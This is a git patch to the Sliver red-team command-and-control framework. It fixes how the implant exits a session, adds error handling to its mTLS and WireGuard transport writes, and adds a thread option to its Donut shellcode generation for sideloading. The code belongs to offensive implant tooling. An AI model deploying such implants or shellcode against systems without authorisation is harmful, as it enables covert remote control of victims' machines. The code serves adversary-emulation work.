From b7c8cba630ca3c27bd28367c9450482633b8127e Mon Sep 17 00:00:00 2001 From: rkervella Date: Fri, 16 Jun 2023 09:14:04 -0700 Subject: [PATCH] Fix implant exit code. --- implant/sliver/sliver.go | 10 ++++++++-- implant/sliver/transports/mtls/mtls.go | 14 ++++++++++++-- implant/sliver/transports/session.go | 4 ++-- implant/sliver/transports/wireguard/wireguard.go | 14 ++++++++++++-- server/generate/donut.go | 10 ++++++++-- server/rpc/rpc-tasks.go | 4 ++-- 6 files changed, 44 insertions(+), 12 deletions(-) diff --git a/implant/sliver/sliver.go b/implant/sliver/sliver.go index bbf5c53520..638c906a9c 100644 --- a/implant/sliver/sliver.go +++ b/implant/sliver/sliver.go @@ -27,6 +27,7 @@ import "C" import ( "crypto/rand" "encoding/binary" + "errors" insecureRand "math/rand" "os" @@ -64,6 +65,7 @@ import ( var ( InstanceID string connectionErrors = 0 + ErrTerminate = errors.New("terminate") ) func init() { @@ -545,6 +547,10 @@ func openSessionHandler(data []byte) { connectionAttempts++ if connection != nil { err := sessionMainLoop(connection) + if err == ErrTerminate { + connection.Cleanup() + return + } if err == nil { break } @@ -597,11 +603,11 @@ func sessionMainLoop(connection *transports.Connection) error { rportfwdHandlers := handlers.GetRportFwdHandlers() for envelope := range connection.Recv { - if handler, ok := specialHandlers[envelope.Type]; ok { + if _, ok := specialHandlers[envelope.Type]; ok { // {{if .Config.Debug}} log.Printf("[recv] specialHandler %d", envelope.Type) // {{end}} - handler(envelope.Data, connection) + return ErrTerminate } else if handler, ok := pivotHandlers[envelope.Type]; ok { // {{if .Config.Debug}} log.Printf("[recv] pivotHandler with type %d", envelope.Type) diff --git a/implant/sliver/transports/mtls/mtls.go b/implant/sliver/transports/mtls/mtls.go index 280e969a59..e4e46807ea 100644 --- a/implant/sliver/transports/mtls/mtls.go +++ b/implant/sliver/transports/mtls/mtls.go @@ -65,8 +65,18 @@ func WriteEnvelope(connection *tls.Conn, envelope *pb.Envelope) error { } dataLengthBuf := new(bytes.Buffer) binary.Write(dataLengthBuf, binary.LittleEndian, uint32(len(data))) - connection.Write(dataLengthBuf.Bytes()) - connection.Write(data) + if _, werr := connection.Write(dataLengthBuf.Bytes()); werr != nil { + // {{if .Config.Debug}} + log.Print("Error writing data length: ", werr) + // {{end}} + return werr + } + if _, werr := connection.Write(data); werr != nil { + // {{if .Config.Debug}} + log.Print("Error writing data: ", werr) + // {{end}} + return werr + } return nil } diff --git a/implant/sliver/transports/session.go b/implant/sliver/transports/session.go index b251a8fdac..082c738f0d 100644 --- a/implant/sliver/transports/session.go +++ b/implant/sliver/transports/session.go @@ -258,7 +258,7 @@ func mtlsConnect(uri *url.URL) (*Connection, error) { return } case <-time.After(mtls.PingInterval): - mtls.WritePing(conn) + err = mtls.WritePing(conn) if err != nil { return } @@ -370,7 +370,7 @@ func wgConnect(uri *url.URL) (*Connection, error) { return } case <-time.After(wireguard.PingInterval): - wireguard.WritePing(conn) + err = wireguard.WritePing(conn) if err != nil { return } diff --git a/implant/sliver/transports/wireguard/wireguard.go b/implant/sliver/transports/wireguard/wireguard.go index a8ef509b28..603b556313 100644 --- a/implant/sliver/transports/wireguard/wireguard.go +++ b/implant/sliver/transports/wireguard/wireguard.go @@ -89,8 +89,18 @@ func WriteEnvelope(connection net.Conn, envelope *pb.Envelope) error { } dataLengthBuf := new(bytes.Buffer) binary.Write(dataLengthBuf, binary.LittleEndian, uint32(len(data))) - connection.Write(dataLengthBuf.Bytes()) - connection.Write(data) + if _, werr := connection.Write(dataLengthBuf.Bytes()); werr != nil { + // {{if .Config.Debug}} + log.Print("Socket error (write msg-length): ", werr) + // {{end}} + return werr + } + if _, werr := connection.Write(data); werr != nil { + // {{if .Config.Debug}} + log.Print("Socket error (write msg): ", werr) + // {{end}} + return werr + } return nil } diff --git a/server/generate/donut.go b/server/generate/donut.go index 94933b9c40..59bc7347a7 100644 --- a/server/generate/donut.go +++ b/server/generate/donut.go @@ -16,11 +16,11 @@ func DonutShellcodeFromFile(filePath string, arch string, dotnet bool, params st return } isDLL := (filepath.Ext(filePath) == ".dll") - return DonutShellcodeFromPE(pe, arch, dotnet, params, className, method, isDLL, false) + return DonutShellcodeFromPE(pe, arch, dotnet, params, className, method, isDLL, false, true) } // DonutShellcodeFromPE returns a Donut shellcode for the given PE file -func DonutShellcodeFromPE(pe []byte, arch string, dotnet bool, params string, className string, method string, isDLL bool, isUnicode bool) (data []byte, err error) { +func DonutShellcodeFromPE(pe []byte, arch string, dotnet bool, params string, className string, method string, isDLL bool, isUnicode bool, createNewThread bool) (data []byte, err error) { ext := ".exe" if isDLL { ext = ".dll" @@ -29,6 +29,11 @@ func DonutShellcodeFromPE(pe []byte, arch string, dotnet bool, params string, cl if isUnicode { isUnicodeVar = 1 } + + thread := uint32(0) + if createNewThread { + thread = 1 + } donutArch := getDonutArch(arch) // We don't use DonutConfig.Thread = 1 because we create our own remote thread // in the task runner, and we're doing some housekeeping on it. @@ -49,6 +54,7 @@ func DonutShellcodeFromPE(pe []byte, arch string, dotnet bool, params string, cl Compress: uint32(1), // 1=disable, 2=LZNT1, 3=Xpress, 4=Xpress Huffman ExitOpt: 1, // exit thread Unicode: isUnicodeVar, + Thread: thread, } return getDonut(pe, &config) } diff --git a/server/rpc/rpc-tasks.go b/server/rpc/rpc-tasks.go index e49f9ae052..37ccf0c175 100644 --- a/server/rpc/rpc-tasks.go +++ b/server/rpc/rpc-tasks.go @@ -216,7 +216,7 @@ func (rpc *Server) Sideload(ctx context.Context, req *sliverpb.SideloadReq) (*sl } if getOS(session, beacon) == "windows" { - shellcode, err := generate.DonutShellcodeFromPE(req.Data, arch, false, req.Args, "", req.EntryPoint, req.IsDLL, req.IsUnicode) + shellcode, err := generate.DonutShellcodeFromPE(req.Data, arch, false, req.Args, "", req.EntryPoint, req.IsDLL, req.IsUnicode, false) if err != nil { tasksLog.Errorf("Sideload failed: %s", err) return nil, err @@ -315,7 +315,7 @@ func getSliverShellcode(name string) ([]byte, string, error) { if err != nil { return []byte{}, "", err } - data, err = generate.DonutShellcodeFromPE(fileData, build.ImplantConfig.GOARCH, false, "", "", "", false, false) + data, err = generate.DonutShellcodeFromPE(fileData, build.ImplantConfig.GOARCH, false, "", "", "", false, false, false) if err != nil { rpcLog.Errorf("DonutShellcodeFromPE error: %v\n", err) return []byte{}, "", err